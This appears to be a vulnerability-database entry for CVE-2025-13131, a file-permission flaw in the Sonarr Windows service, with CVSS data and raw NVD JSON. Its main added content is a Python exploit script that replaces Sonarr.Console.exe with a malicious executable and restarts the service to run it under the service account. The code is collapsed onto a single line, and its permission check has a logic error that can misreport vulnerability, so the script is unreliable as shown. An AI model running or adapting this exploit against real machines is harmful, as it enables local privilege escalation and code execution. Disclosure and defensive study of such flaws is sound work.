Security Vulnerability Report
中文
CVE-2025-13131 CVSS 7.8 HIGH

CVE-2025-13131

Published: 2025-11-13 22:15:50
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

A vulnerability was found in Sonarr 4.0.15.2940. The impacted element is an unknown function of the file C:\ProgramData\Sonarr\bin\Sonarr.Console.exe of the component Service. Performing manipulation results in incorrect default permissions. The attack is only possible with local access. The vendor confirms this vulnerability but classifies it as a "low severity issue due to the default service user being used as it would either require someone to intentionally change the service to a highly privileged account or an attacker would need an admin level account". It is planned to fix this issue in the next major release v5.

CVSS Details

CVSS Score
7.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Sonarr 4.0.15.2940

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-13131 PoC - Sonarr Service Permission Misconfiguration # This PoC demonstrates the permission vulnerability in Sonarr 4.0.15.2940 # Author: Security Researcher # Date: 2025-11-13 import os import shutil import subprocess import sys SONARR_PATH = r"C:\ProgramData\Sonarr\bin\Sonarr.Console.exe" MALICIOUS_EXE = "malicious_payload.exe" # Replace with actual malicious executable def check_vulnerability(): """Check if Sonarr executable has insecure permissions""" try: # Check current permissions on the file result = subprocess.run( ['icacls', SONARR_PATH], capture_output=True, text=True ) print("[+] Current permissions on Sonarr.Console.exe:") print(result.stdout) # Check if Users group has write access if 'Users' in result.stdout and 'F' in result.stdout or 'W' in result.stdout: print("[!] VULNERABLE: Users group has write/modify permissions") return True else: print("[-] NOT VULNERABLE: Permissions appear to be secure") return False except Exception as e: print(f"[-] Error checking permissions: {e}") return False def exploit_vulnerability(): """Exploit the vulnerability by replacing the Sonarr executable""" try: # Backup original executable backup_path = SONARR_PATH + ".backup" print(f"[+] Backing up original executable to {backup_path}") shutil.copy2(SONARR_PATH, backup_path) # Replace with malicious executable print(f"[+] Replacing {SONARR_PATH} with malicious payload") shutil.copy2(MALICIOUS_EXE, SONARR_PATH) # Verify replacement if os.path.exists(SONARR_PATH): print("[+] Replacement successful") print("[!] Malicious code will execute when Sonarr service restarts") # Try to restart the service try: print("[+] Attempting to restart Sonarr service...") subprocess.run(['net', 'stop', 'Sonarr'], capture_output=True, timeout=30) subprocess.run(['net', 'start', 'Sonarr'], capture_output=True, timeout=30) print("[+] Service restart triggered") except: print("[!] Could not restart service automatically - manual restart required") else: print("[-] Replacement failed") except Exception as e: print(f"[-] Exploitation error: {e}") def restore_original(): """Restore the original executable after exploitation""" try: backup_path = SONARR_PATH + ".backup" if os.path.exists(backup_path): shutil.copy2(backup_path, SONARR_PATH) os.remove(backup_path) print("[+] Original executable restored") except Exception as e: print(f"[-] Restore error: {e}") if __name__ == "__main__": print("CVE-2025-13131 - Sonarr Service Permission Misconfiguration") print("=" * 60) if len(sys.argv) > 1 and sys.argv[1] == "--exploit": exploit_vulnerability() elif len(sys.argv) > 1 and sys.argv[1] == "--restore": restore_original() else: print("Usage:") print(" python cve-2025-13131.py --exploit : Exploit the vulnerability") print(" python cve-2025-13131.py --restore : Restore original executable") print() check_vulnerability()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-13131", "sourceIdentifier": "[email protected]", "published": "2025-11-13T22:15:50.227", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was found in Sonarr 4.0.15.2940. The impacted element is an unknown function of the file C:\\ProgramData\\Sonarr\\bin\\Sonarr.Console.exe of the component Service. Performing manipulation results in incorrect default permissions. The attack is only possible with local access. The vendor confirms this vulnerability but classifies it as a \"low severity issue due to the default service user being used as it would either require someone to intentionally change the service to a highly privileged account or an attacker would need an admin level account\". It is planned to fix this issue in the next major release v5."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.5, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:L/AC:L/Au:S/C:C/I:C/A:C", "baseScore": 6.8, "accessVector": "LOCAL", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "availabilityImpact": "COMPLETE"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 3.1, "impactScore": 10.0, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-266"}, {"lang": "en", "value": "CWE-276"}]}], "references": [{"url": "https://github.com/lakshayyverma/CVE-Discovery/blob/main/Sonarr.md", "source": "[email protected]"}, {"url": "https://vuldb.com/?ctiid.332362", "source": "[email protected]"}, {"url": "https://vuldb.com/?id.332362", "source": "[email protected]"}, {"url": "https://vuldb.com/?submit.683894", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.